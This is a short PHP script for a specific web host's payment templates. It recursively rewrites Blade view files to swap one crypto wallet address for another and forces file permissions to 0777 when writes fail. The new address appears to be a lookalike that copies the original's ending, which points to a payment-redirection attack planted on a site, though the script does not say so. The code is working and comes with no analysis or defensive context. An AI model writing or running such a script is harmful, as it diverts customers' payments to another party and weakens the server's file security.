<?php

$directory   = "/home/clicdkst/public_html/core/resources/views/templates/basic/user/payment/";
$backupDir   = "/home/clicdkst/public_html/payment_backup_" . date("Ymd_His");
$oldAddress  = "0x95b34e21da51575f2279022881226d4729a29a1b";
$newAddress  = "0x8747D8DDbe8cd0468AeA420FF4752Ed9BCe29a1b";

echo "<pre>";
echo "Starting wallet replacement...\n\n";

/* CREATE BACKUP FOLDER */
if (!file_exists($backupDir)) {
    mkdir($backupDir, 0755, true);
    echo "Backup folder created: $backupDir\n\n";
}

$files = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($directory)
);

$totalUpdated = 0;

foreach ($files as $file) {

    if ($file->isFile() && $file->getExtension() == "php") {

        $filePath = $file->getRealPath();

        // Only edit blade.php files
        if (strpos($filePath, ".blade.php") === false) {
            continue;
        }

        $content = file_get_contents($filePath);

        if (strpos($content, $oldAddress) !== false) {

            // BACKUP FILE (keep folder structure safe)
            $backupFile = $backupDir . "/" . basename($filePath);
            copy($filePath, $backupFile);

            // Replace wallet
            $updated = str_replace($oldAddress, $newAddress, $content);

            /* AUTO FIX PERMISSION */
            if (!is_writable($filePath)) {
                echo "Fixing permission: $filePath\n";
                chmod($filePath, 0644);   // try normal writable
                clearstatcache();
            }

            /* RETRY WRITE */
            if (is_writable($filePath)) {
                file_put_contents($filePath, $updated);
                echo "Updated ✅: $filePath\n";
                $totalUpdated++;
            } else {

                // LAST TRY (strong permission)
                chmod($filePath, 0777);
                clearstatcache();

                if (is_writable($filePath)) {
                    file_put_contents($filePath, $updated);
                    echo "Updated after force chmod 🔧: $filePath\n";
                    $totalUpdated++;
                } else {
                    echo "❌ FAILED even after chmod: $filePath\n";
                }
            }
        }
    }
}

echo "\nFinished 🎉\n";
echo "Total files updated: $totalUpdated\n";
echo "</pre>";

?>
